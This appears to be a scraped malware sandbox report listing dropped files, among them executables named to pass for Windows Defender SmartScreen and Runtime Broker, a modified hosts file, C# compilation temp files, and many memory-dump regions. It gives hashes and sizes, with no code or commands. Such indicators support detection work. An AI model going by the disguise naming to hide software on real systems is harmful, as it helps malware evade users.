bc39bb66d04eadac63864e07f3d5f96c19d00b1ba892e62c360fab0892daf5e4c01f2a5c1086696991e22e1dd470de08b5079b0b1b8046b3f46f212f3e91ac55

Download Submit
C:\Users\Admin\AppData\Roaming\Windows Defender Smartscreen.exe
Filesize
2.7MB

MD5
5e6747eb44d49452bc43b02ad9d022e5

SHA1
3d91d621820b70fa6bf7840abf66baa7bebdd2f2

SHA256
a0438a63eb2c3d9c861c55d2f6223349f2b87f30dae77297cb25826e2fc3d672

SHA512
16f4794efc0bb2efc75e167cfd772cbc4fcec5439c92d6ac12f206d20f46ce2eae1f54bc5a88839a7ae8982c6b70ddbae133fc8f684bb879fcd32976406737da

Download Submit
C:\Users\Admin\AppData\Roaming\Windows Defender Smartscreen.exe
Filesize
2.0MB

MD5
afa1e9459885240c173caca68a14c2de

SHA1
85e485ca7068bbc859949cbdb317de8b68723176

SHA256
1b78bcfa90abee275901d44067ce6f299a1b5d85afc68a41c2fd907b23d62d65

SHA512
cb105b63817d4a4fec1550a83d8b7474c98e43aaf73475b90979881937b479426874f66121221970fbaca28803b8607849883765099b00a773300e37bdcb9dff

Download Submit
C:\Windows\Runtime broker.exe
Filesize
80KB

MD5
4de8d786d98e91b729b922d851ffb999

SHA1
0d201186b3749418cf83f047cda5f3933cae6178

SHA256
2b2cccac0931eedf03f91f48d012f993c9577ed554fdef8cd300438510feaff5

SHA512
8b921c96dc50a54b34c0ece345c399be84174969e46877d4b105c31931953bcd8879c85c38f19ef6d10da7882e4c10a9834386f7f34a014385d9c70312bbf13c

Download Submit
C:\Windows\System32\drivers\etc\hosts
Filesize
2KB

MD5
f99e42cdd8b2f9f1a3c062fe9cf6e131

SHA1
e32bdcab8da0e3cdafb6e3876763cee002ab7307

SHA256
a040d43136f2f4c41a4875f895060fb910267f2ffad2e3b1991b15c92f53e0f0

SHA512
c55a5e440326c59099615b21d0948cdc2a42bd9cf5990ec88f69187fa540d8c2e91aebe6a25ed8359a47be29d42357fec4bd987ca7fae0f1a6b6db18e1c320a6

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\bq15xoyl\CSC449C03818A954F088B9C56D7553F91A.TMP
Filesize
652B

MD5
7e6eb9c07318f14ddc624dd8cc7361f7

SHA1
140349e78d098fe65a70c23a55bd8668298dde0d

SHA256
fb7d35f776cc6670b9f55e48978b6101309c3fd7925cdb202a7dd24e49bbc83c

SHA512
aeb39385d60b924911c8013f2f11398ab6a90b0bad348766883baf90be60d5fa871162a4d20a2109ef572c482e562a60434b61c5506a550a691e5146f28f09d0

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\bq15xoyl\bq15xoyl.0.cs
Filesize
1004B

MD5
c76055a0388b713a1eabe16130684dc3

SHA1
ee11e84cf41d8a43340f7102e17660072906c402

SHA256
8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

SHA512
22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\bq15xoyl\bq15xoyl.cmdline
Filesize
607B

MD5
0af431e583455a71528b10cc9237b541

SHA1
4c5b3e1a837b899277b521df6afad188603ded72

SHA256
ffe9e35e8b42489494d22b569bb1354a9ee5e3801725a2c278c577e33f63ad0e

SHA512
0c7fb86ee3eb8a5947f1f8acb03cd60f711c32b0cdae13b3d2c2a2e792bc6524d6bd2edb33713259cee80df150b4380761b444805e5704e033f175ba7a3dad66

Download Submit
memory/328-327-0x0000029B26920000-0x0000029B26A6F000-memory.dmp

Filesize
1.3MB

Download
memory/456-448-0x000002A299E50000-0x000002A299F9F000-memory.dmp

Filesize
1.3MB

Download
memory/764-348-0x0000021E46BC0000-0x0000021E46D0F000-memory.dmp

Filesize
1.3MB

Download
memory/764-191-0x0000021E2E9F0000-0x0000021E2EA00000-memory.dmp

Filesize
64KB

Download
memory/764-192-0x00007FFBC2920000-0x00007FFBC33E2000-memory.dmp

Filesize
10.8MB

Download
memory/764-190-0x0000021E2E9F0000-0x0000021E2EA00000-memory.dmp

Filesize
64KB

Download
memory/1000-101-0x00000000057C0000-0x00000000057CA000-memory.dmp

Filesize
40KB

Download
memory/1000-30-0x0000000005D50000-0x00000000062F6000-memory.dmp

Filesize
5.6MB

Download
memory/1000-105-0x0000000005A70000-0x0000000005AC8000-memory.dmp

Filesize
352KB

Download
memory/1000-153-0x0000000005810000-0x0000000005820000-memory.dmp

Filesize
64KB

Download
memory/1000-40-0x0000000005840000-0x00000000058D2000-memory.dmp

Filesize
584KB

Download
memory/1000-240-0x0000000005810000-0x0000000005820000-memory.dmp

Filesize
64KB

Download
memory/1000-13-0x0000000000E40000-0x0000000000E50000-memory.dmp

Filesize
64KB

Download
memory/1000-203-0x0000000073630000-0x0000000073DE1000-memory.dmp

Filesize
7.7MB

Download
memory/1000-41-0x0000000073630000-0x0000000073DE1000-memory.dmp

Filesize
7.7MB

Download
memory/1980-369-0x000002857C8B0000-0x000002857C9FF000-memory.dmp

Filesize
1.3MB

Download
memory/2024-217-0x000002770B530000-0x000002770B540000-memory.dmp

Filesize
64KB

Download
memory/2024-215-0x00007FFBC2920000-0x00007FFBC33E2000-memory.dmp

Filesize
10.8MB

Download
memory/2024-218-0x000002770B530000-0x000002770B540000-memory.dmp

Filesize
64KB

Download
memory/2024-345-0x0000027723890000-0x00000277239DF000-memory.dmp

Filesize
1.3MB

Download
memory/2024-241-0x000002770B530000-0x000002770B540000-memory.dmp

Filesize
64KB

Download
memory/2148-402-0x000001BFCA7C0000-0x000001BFCA90F000-memory.dmp

Filesize
1.3MB

Download
memory/3136-188-0x00000210E1A10000-0x00000210E1A20000-memory.dmp

Filesize
64KB

Download
memory/3136-189-0x00000210E1A10000-0x00000210E1A20000-memory.dmp

Filesize
64KB

Download
memory/3136-344-0x00000210E1B20000-0x00000210E1C6F000-memory.dmp

Filesize
1.3MB

Download
memory/3136-187-0x00007FFBC2920000-0x00007FFBC33E2000-memory.dmp

Filesize
10.8MB

Download
memory/3136-193-0x00000210E1920000-0x00000210E1942000-memory.dmp

Filesize
136KB

Download
memory/4052-245-0x00007FFBC2920000-0x00007FFBC33E2000-memory.dmp

Filesize
10.8MB

Download
memory/4052-246-0x000001E02E8C0000-0x000001E02E8D0000-memory.dmp

Filesize
64KB

Download
memory/4052-288-0x000001E02EAE0000-0x000001E02EC2F000-memory.dmp

Filesize
1.3MB

Download
memory/4132-120-0x0000000006040000-0x00000000060A6000-memory.dmp

Filesize
408KB

Download
memory/4132-181-0x00000000066B0000-0x00000000066FC000-memory.dmp

Filesize
304KB

Download
memory/4132-14-0x00000000031A0000-0x00000000031D6000-memory.dmp

Filesize
216KB

Download
memory/4132-214-0x00000000075E0000-0x0000000007614000-memory.dmp

Filesize
208KB

Download
memory/4132-202-0x0000000073630000-0x0000000073DE1000-memory.dmp

Filesize
7.7MB

Download
memory/4132-216-0x0000000073420000-0x000000007346C000-memory.dmp

Filesize
304KB

Download
memory/4132-24-0x0000000073630000-0x0000000073DE1000-memory.dmp

Filesize
7.7MB

Download
memory/4132-227-0x00000000075C0000-0x00000000075DE000-memory.dmp

Filesize
120KB

Download
memory/4132-25-0x0000000005980000-0x0000000005FAA000-memory.dmp

Filesize
6.2MB

Download
memory/4132-228-0x000000007F280000-0x000000007F290000-memory.dmp

Filesize
64KB

Download
memory/4132-230-0x0000000003110000-0x0000000003120000-memory.dmp

Filesize
64KB

Download
memory/4132-229-0x0000000007820000-0x00000000078C4000-memory.dmp

Filesize
656KB

Download
memory/4132-239-0x0000000003110000-0x0000000003120000-memory.dmp

Filesize
64KB

Download
memory/4132-52-0x0000000003110000-0x0000000003120000-memory.dmp

Filesize
64KB

Download
memory/4132-242-0x0000000007FC0000-0x000000000863A000-memory.dmp

Filesize
6.5MB

Download
memory/4132-106-0x0000000005650000-0x0000000005672000-memory.dmp

Filesize
136KB

Download
memory/4132-100-0x0000000003110000-0x0000000003120000-memory.dmp

Filesize
64KB

Download
memory/4132-243-0x00000000079A0000-0x00000000079BA000-memory.dmp

Filesize
104KB

Download
memory/4132-129-0x0000000006120000-0x0000000006186000-memory.dmp

Filesize
408KB

Download
memory/4132-138-0x0000000006190000-0x00000000064E7000-memory.dmp

Filesize
3.3MB

Download
memory/4132-173-0x0000000005490000-0x00000000054AE000-memory.dmp

Filesize
120KB

Download
memory/4132-212-0x0000000003110000-0x0000000003120000-memory.dmp

Filesize
64KB

Download
memory/4264-184-0x00007FFBD4270000-0x00007FFBD4284000-memory.dmp

Filesize
80KB

Download
memory/4264-165-0x00007FFBBF030000-0x00007FFBBF1A7000-memory.dmp

Filesize
1.5MB

Download
memory/4264-182-0x00007FFBD4AF0000-0x00007FFBD4B13000-memory.dmp

Filesize
140KB

Download
memory/4264-177-0x00007FFBBECB0000-0x00007FFBBF028000-memory.dmp

Filesize
3.5MB

Download
memory/4264-185-0x00007FFBD4DC0000-0x00007FFBD4DCD000-memory.dmp

Filesize
52KB

Download
memory/4264-172-0x00007FFBC9280000-0x00007FFBC9338000-memory.dmp

Filesize
736KB

Download
memory/4264-166-0x00007FFBDA190000-0x00007FFBDA19D000-memory.dmp

Filesize
52KB

Download
memory/4264-464-0x00007FFBBF030000-0x00007FFBBF1A7000-memory.dmp

Filesize
1.5MB

Download
memory/4264-130-0x00007FFBBF1B0000-0x00007FFBBF799000-memory.dmp

Filesize
5.9MB

Download
memory/4264-186-0x00007FFBBEB90000-0x00007FFBBECAC000-memory.dmp

Filesize
1.1MB

Download
memory/4264-137-0x00007FFBD4E50000-0x00007FFBD4E73000-memory.dmp

Filesize
140KB

Download
memory/4264-139-0x00007FFBDE3D0000-0x00007FFBDE3DF000-memory.dmp

Filesize
60KB

Download
memory/4264-451-0x00007FFBD4E50000-0x00007FFBD4E73000-memory.dmp

Filesize
140KB

Download
memory/4264-180-0x00007FFBD5000000-0x00007FFBD5019000-memory.dmp

Filesize
100KB

Download
memory/4264-179-0x00000142ABE00000-0x00000142AC178000-memory.dmp

Filesize
3.5MB

Download
memory/4264-244-0x00007FFBBF1B0000-0x00007FFBBF799000-memory.dmp

Filesize
5.9MB

Download
memory/4264-450-0x00007FFBBF1B0000-0x00007FFBBF799000-memory.dmp

Filesize
5.9MB

Download
memory/4264-149-0x00007FFBD4B20000-0x00007FFBD4B4D000-memory.dmp

Filesize
180KB

Download
memory/4264-167-0x00007FFBD4290000-0x00007FFBD42BE000-memory.dmp

Filesize
184KB

Download
memory/4264-183-0x00007FFBD4AC0000-0x00007FFBD4AD9000-memory.dmp

Filesize
100KB

Download
memory/4408-213-0x00007FFBC2920000-0x00007FFBC33E2000-memory.dmp

Filesize
10.8MB

Download
memory/4408-42-0x0000000000E70000-0x0000000000E8A000-memory.dmp

Filesize
104KB

Download
memory/4408-113-0x00007FFBC2920000-0x00007FFBC33E2000-memory.dmp

Filesize
10.8MB

Download
memory/4880-383-0x000001F5EDD50000-0x000001F5EDE9F000-memory.dmp

Filesize
1.3MB

Download
memory/5464-478-0x00000271FB8E0000-0x00000271FBA2F000-memory.dmp

Filesize
1.3MB

Download
memory/5636-354-0x00000238CFD30000-0x00000238CFE7F000-memory.dmp

Filesize
1.3MB

Download